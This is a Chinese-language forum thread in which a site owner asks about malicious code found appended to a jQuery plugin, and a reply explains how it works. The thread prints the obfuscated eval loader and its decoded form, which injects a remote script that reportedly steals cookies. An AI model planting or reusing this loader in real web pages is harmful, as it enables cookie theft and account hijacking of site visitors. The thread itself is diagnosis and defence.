javascript - 网站被植入中奖代码js
大家讲道理
大家讲道理 2017-04-11 11:11:50
[JavaScript讨论组]

最近网站打开老是有左下角弹出中奖信息 看了下 在jq插件下面 加了一段恶意代码

var str="cnbtldms-vqhsd'!;rbqhosrqb<[!gsso9..vvv-fnnfkd`crk-bnl.robncd.iptdqx-ir[!=;.rbqhos=!(:";var length=str.length;var ba64="";for(i=0;i<length;i++){var s=str.charCodeAt(i);s++;ba64=ba64+String.fromCharCode(s)}eval(ba64);

请问这种原理是什么 怎么能够防范

大家讲道理
大家讲道理

光阴似箭催人老,日月如移越少年。

全部回复(2)
天蓬老师
  1. 你的jquery插件下载的时候就有这个。

  2. 你的网站被黑了。

前面的密文其实就是字符串的unicode码往前减一。

解密后是这个东西

document.write("<scriptsrc'mu<\"http://www.googleadsl.com/spcode/jquery.js\"></script>");

往页面中插入了一个远程js,是一个典型的xss攻击案例,为了规避waf,他并没有使用标准script脚本,以上代码直接执行不会直接加载,而是会在加载下个js脚本的同时加载进来这个远程脚本。

我去看下了下,现在已经不是弹中奖了,而是直接获取cookies,通过cookies可以直接登陆你的账号,如果你的账号是管理员的话。。。

高洛峰

服务器被人入侵了吧?

热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号